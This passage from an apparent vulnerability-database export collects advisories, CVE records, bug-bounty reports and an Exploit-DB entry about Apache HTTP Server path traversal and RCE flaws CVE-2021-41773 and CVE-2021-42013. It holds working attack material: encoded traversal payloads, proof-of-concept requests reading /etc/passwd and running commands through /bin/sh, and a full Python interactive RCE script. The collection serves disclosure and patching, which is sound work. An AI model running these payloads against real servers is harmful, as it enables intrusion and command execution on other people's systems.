Rapid7\u2019s research team has a [full root cause analysis of CVE-2021-41773 here](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) along with proofs of concept.\n\nRapid7 Labs has identified roughly 65,000 potentially vulnerable versions of Apache httpd exposed to the public internet. Our exposure estimate intentionally does not count multiple Apache servers on the same IP as different instances (this would substantially increase the number of exposed instances identified as vulnerable).\n\n\n\n## Mitigation guidance\n\nOrganizations that are using Apache HTTP Server 2.4.49 or 2.4.50 should determine whether they are using vulnerable configurations. If a vulnerable server is discovered, the server\u2019s configuration file should be updated to include the filesystem directory directive with _require all denied_:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\nApache HTTP Server users should update to **2.4.51** or later as soon as is practical. Updating to HTTP Server 2.4.51 remediates both CVE-2021-41773 and CVE-2021-42013. For more information, see [Apache\u2019s advisory here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Rapid7 customers\n\nA remote vulnerability check for CVE-2021-41773 was released to InsightVM and Nexpose customers in the October 6, 2021 content update.\n\nA remote vulnerability check for CVE-2021-42013 was released to InsightVM and Nexpose customers in the October 7, 2021 content update.\n\n## Updates\n\n**October 7, 2021:** Apache has updated their advisory to note that the patch for CVE-2021-41773 was incomplete, rendering HTTP Server 2.4.50 versions vulnerable when specific, non-default conditions are met. According to their advisory, "an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. 
If files outside of these directories are not protected by the usual default configuration _require all denied_, these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution."\n\nCVE-2021-42013 has been assigned to track the incomplete fix for CVE-2021-41773. CVE-2021-42013 has been fixed in HTTP Server version 2.4.51 released October 7, 2021. For more information, [see Apache's advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {}, "published": "2021-10-06T16:42:32", "type": "rapid7blog", "title": "Apache HTTP Server CVE-2021-41773 Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T16:42:32", "id": "RAPID7BLOG:9C7E6BE350F06790928CFF68E04A6ECE", "href": "https://blog.rapid7.com/2021/10/06/apache-http-server-cve-2021-41773-exploited-in-the-wild/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-10-05T20:49:35", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. 
This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "cve", "title": "CVE-2021-42013", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "cpe": ["cpe:/a:apache:http_server:2.4.50", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/o:fedoraproject:fedora:35", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:netapp:cloud_backup:-", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/o:fedoraproject:fedora:34", "cpe:/a:oracle:instantis_enterprisetrack:17.1"], "id": "CVE-2021-42013", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.50:*:*:*:*:*:*:*"]}, {"lastseen": "2022-10-28T18:32:05", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "cve", "title": "CVE-2021-41773", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": 
"2022-10-28T16:16:00", "cpe": ["cpe:/o:fedoraproject:fedora:35", "cpe:/a:netapp:cloud_backup:-", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/a:oracle:instantis_enterprisetrack:17.1", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-41773", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-10-28T15:33:28", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. 
No exploit is known to the project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "cve", "title": "CVE-2021-41524", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2022-10-28T13:51:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:oracle:instantis_enterprisetrack:17.1", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/o:fedoraproject:fedora:35", "cpe:/a:netapp:cloud_backup:-"], "id": "CVE-2021-41524", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41524", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*"]}], "hackerone": [{"lastseen": "2023-01-31T16:25:01", "bounty": 1000.0, "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n-\nMy friend Juan Escobar @itsecurityco and me (Fernando Munoz) reported this internally to Apache HTTPd project and worked with them to test the new patch before the new version was released.\n\n## Impact\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-14T23:54:06", "type": "hackerone", "title": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication":
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-19T00:14:57", "id": "H1:1400238", "href": "https://hackerone.com/reports/1400238", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-31T16:25:08", "bounty": 4000.0, "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\n## Impact\n\nThe attacker may be able to read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism.
For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T21:47:54", "type": "hackerone", "title": "Internet Bug Bounty: Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-09T20:19:52", "id": "H1:1394916", "href": "https://hackerone.com/reports/1394916", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-31T16:25:00", "bounty": 1000.0, "description": "Hello Apache team,\n\n@fms and myself were able to bypass the latest patch for CVE 2021-41773 in the Apache 2.4.50.\n\nThese are the payloads:\n\n1) %%32%65%%32%65\n2) .%%32%65\n3) .%%32e\n4) .%2%65\n\nPoC Path Traversal\n\nGET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: localhost:83\nsec-ch-ua: \";Not A Brand\";v=\"99\", \"Chromium\";v=\"94\"\nsec-ch-ua-mobile: 
?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPoC RCE\n\nPOST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: 192.168.88.201\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9,es;q=0.8\nIf-None-Match: \"2aa6-5cda88e8a6005-gzip\"\nIf-Modified-Since: Wed, 06 Oct 2021 05:38:33 GMT\nConnection: close\nContent-Length: 60\n\necho Content-Type: text/plain; echo; id; uname;apache2ctl -M\n\n## Impact\n\nAn attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. 
If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-18T21:56:01", "type": "hackerone", "title": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.50", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-11-19T23:45:37", "id": "H1:1404731", "href": "https://hackerone.com/reports/1404731", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:03:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "exploitdb", "title": "Apache HTTP Server
2.4.50 - Remote Code Execution (RCE) (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-41773", "2021-42013", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-11T00:00:00", "id": "EDB-ID:50512", "href": "https://www.exploit-db.com/exploits/50512", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)\r\n# Date: 11/11/2021\r\n# Exploit Author: Valentin Lobstein\r\n# Vendor Homepage: https://apache.org/\r\n# Version: Apache 2.4.49/2.4.50 (CGI enabled)\r\n# Tested on: Debian GNU/Linux\r\n# CVE : CVE-2021-41773 / CVE-2021-42013\r\n# Credits : Lucas Schnell\r\n\r\n\r\n#!/usr/bin/env python3\r\n#coding: utf-8\r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nimport requests\r\nfrom colorama import Fore,Style\r\n\r\n\r\nheader = '''\\033[1;91m\r\n \r\n \u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \r\n \u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \r\n \u2592\u2588\u2588 \u2580\u2588\u2584 
\u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \r\n \u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \r\n \u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592\r\n \u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591\r\n \u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\r\n \u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \r\n''' + Style.RESET_ALL\r\n\r\n\r\nif len(sys.argv) < 2 :\r\n print( 'Use: python3 file.py ip:port ' )\r\n sys.exit()\r\n\r\ndef end():\r\n print(\"\\t\\033[1;91m[!] 
Bye bye !\")\r\n time.sleep(0.5)\r\n sys.exit(1)\r\n\r\ndef commands(url,command,session):\r\n directory = mute_command(url,'pwd')\r\n user = mute_command(url,'whoami')\r\n hostname = mute_command(url,'hostname')\r\n advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)')\r\n command = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \r\n command = f\"echo; {command};\"\r\n req = requests.Request('POST', url=url, data=command)\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n output = response.text\r\n print(output)\r\n if 'clear' in command:\r\n os.system('/usr/bin/clear')\r\n print(header)\r\n if 'exit' in command:\r\n end()\r\n\r\ndef mute_command(url,command):\r\n session = requests.Session()\r\n req = requests.Request('POST', url=url, data=f\"echo; {command}\")\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n return response.text.strip()\r\n\r\n\r\ndef exploitRCE(payload):\r\n s = requests.Session()\r\n try:\r\n host = sys.argv[1]\r\n if 'http' not in host:\r\n url = 'http://'+ host + payload\r\n else:\r\n url = host + payload \r\n session = requests.Session()\r\n command = \"echo; id\"\r\n req = requests.Request('POST', url=url, data=command)\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n output = response.text\r\n if \"uid\" in output:\r\n choice = \"Y\"\r\n print( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host)\r\n print(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output )\r\n choice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? 
(Y/n) : \")\r\n if choice.lower() in ['','y','yes']:\r\n while True:\r\n commands(url,command,session) \r\n else:\r\n end() \r\n else :\r\n print(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host)\r\n except KeyboardInterrupt:\r\n end()\r\n\r\ndef main():\r\n try:\r\n apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'\r\n apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'\r\n payloads = [apache2449_payload,apache2450_payload]\r\n choice = len(payloads) + 1\r\n print(header)\r\n print(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\")\r\n while choice >= len(payloads) and choice >= 0:\r\n choice = int(input('[~] Choice : '))\r\n if choice < len(payloads):\r\n exploitRCE(payloads[choice])\r\n except KeyboardInterrupt:\r\n print(\"\\n\\033[1;91m[!] Bye bye !\")\r\n time.sleep(0.5)\r\n sys.exit(1)\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50512", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2022-11-01T23:20:10", "description": "**Issue Overview:**\n\nA NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193)\n\nA NULL pointer dereference in httpd allows an unauthenticated remote attacker to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798)\n\nAn out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated attacker to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160)\n\nAn out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote attacker to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. 
(CVE-2021-39275)\n\nA Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438)\n\nWhile fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)\n\nA path transversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally this flaw could leak the source of interpreted files like CGI scripts. (CVE-2021-41773)\n\nA path transversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013)\n\n \n**Affected Packages:** \n\n\nhttpd24\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system. 
